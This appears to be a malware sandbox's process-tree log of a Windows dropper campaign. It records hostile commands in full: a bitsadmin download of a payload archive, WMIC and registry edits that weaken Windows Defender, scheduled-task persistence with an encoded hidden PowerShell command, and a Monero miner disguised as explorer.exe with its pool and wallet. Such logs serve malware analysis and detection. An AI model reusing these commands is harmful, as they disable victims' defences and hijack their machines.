C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exeC:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exeC:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exeC:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe13⤵
-
C:\Users\Admin\AppData\Roaming\5685516.scr"C:\Users\Admin\AppData\Roaming\5685516.scr" /S14⤵
-
C:\Users\Admin\AppData\Roaming\3932054.scr"C:\Users\Admin\AppData\Roaming\3932054.scr" /S14⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exeC:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=65413⤵
-
C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"9⤵
-
C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe"C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe10⤵
-
C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe"C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe"C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe"C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe"C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 2687⤵
- Program crash
-
C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe"C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe"C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS3B5E.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS6CFD.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYqjstSoS" /SC once /ST 07:07:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\tdVRLcH.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe"C:\Users\Admin\Documents\ZnOJUZYeiLcgg2qi3EKdqjT5.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe"C:\Users\Admin\Documents\ZwD24QUjPt3CXwW27xWlqIZe.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe"C:\Users\Admin\Documents\DeinJXLjgvheHvdMBWkzIf9S.exe"6⤵
-
C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"C:\Users\Admin\Documents\e3pqPskkJwLs8LEChQJEssCE.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe"C:\Users\Admin\Documents\6h7TGlpVEfKxMzs0E3XQolaC.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe"C:\Users\Admin\Documents\ICL5tqbRIE9gecc0WfBQzYV0.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe"C:\Users\Admin\Documents\CJeRWlxNdVxvx5eZGzAWYfVu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1482356.scr"C:\Users\Admin\AppData\Roaming\1482356.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\3689896.scr"C:\Users\Admin\AppData\Roaming\3689896.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\3027623.scr"C:\Users\Admin\AppData\Roaming\3027623.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1361734.scr"C:\Users\Admin\AppData\Roaming\1361734.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3481701.scr"C:\Users\Admin\AppData\Roaming\3481701.scr" /S7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1223505.scr"C:\Users\Admin\AppData\Roaming\1223505.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8752590.scr"C:\Users\Admin\AppData\Roaming\8752590.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1258873.scr"C:\Users\Admin\AppData\Roaming\1258873.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4051319.scr"C:\Users\Admin\AppData\Roaming\4051319.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7375211.scr"C:\Users\Admin\AppData\Roaming\7375211.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\7375211.scr"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\3144856.scr"C:\Users\Admin\AppData\Roaming\3144856.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 2926⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5865939.scr"C:\Users\Admin\AppData\Roaming\5865939.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1696741.scr"C:\Users\Admin\AppData\Roaming\1696741.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4726559.scr"C:\Users\Admin\AppData\Roaming\4726559.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7424173.scr"C:\Users\Admin\AppData\Roaming\7424173.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6037216.scr"C:\Users\Admin\AppData\Roaming\6037216.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
- Executes dropped EXE
-
